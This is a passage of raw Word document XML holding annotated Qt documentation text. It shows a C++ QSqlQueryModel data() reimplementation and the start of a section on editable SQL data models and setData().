      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="00991333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following implementation returns data for the given model index:</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QVariant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SqlQueryModel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data</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QModelIndex</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> role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const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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>QVariant</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>isValid</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">role </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UserRole</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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value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QSqlQueryModel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data</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index</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role</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rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> columnIdx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role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Qt</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UserRole</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1</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QModelIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modelIndex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this</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index</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index</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row</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columnIdx</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value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QSqlQueryModel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data</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modelIndex</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Qt</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DisplayRole</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rPr>
        <w:t xml:space="preserve">    </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064AC7">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="52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rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</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88385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</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lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2649" w:anchor="qsqlquerymodel" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSqlQueryModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333" w:rsidRPr="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">class is good enough to implement a custom read-only model that represents data in an </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL database</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2650" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>chat tutorial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example demonstrates this very well by implementing a custom model to fetch the contact details from an</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2651" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQLite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="00A0139F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2368" w:name="editable-data-model"/>
      <w:bookmarkStart w:id="2369" w:name="_Toc483001040"/>
      <w:bookmarkStart w:id="2370" w:name="_Toc483604381"/>
      <w:bookmarkStart w:id="2371" w:name="_Toc483605601"/>
      <w:bookmarkEnd w:id="2368"/>
      <w:r w:rsidRPr="00A0139F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Editable Data Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2369"/>
      <w:bookmarkEnd w:id="2370"/>
      <w:bookmarkEnd w:id="2371"/>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="00A0139F" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Besides the</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roleNames()</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data()</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the editable models </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must reimplement the</w:t>
      </w:r>
      <w:r w:rsidR="00A0139F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2652" w:anchor="setData" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>setData</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A0139F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">method to save changes to existing SQL data. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0139F">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the method checks if the given model index is valid and the</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is equal to</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2653" w:anchor="ItemDataRole-enum" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
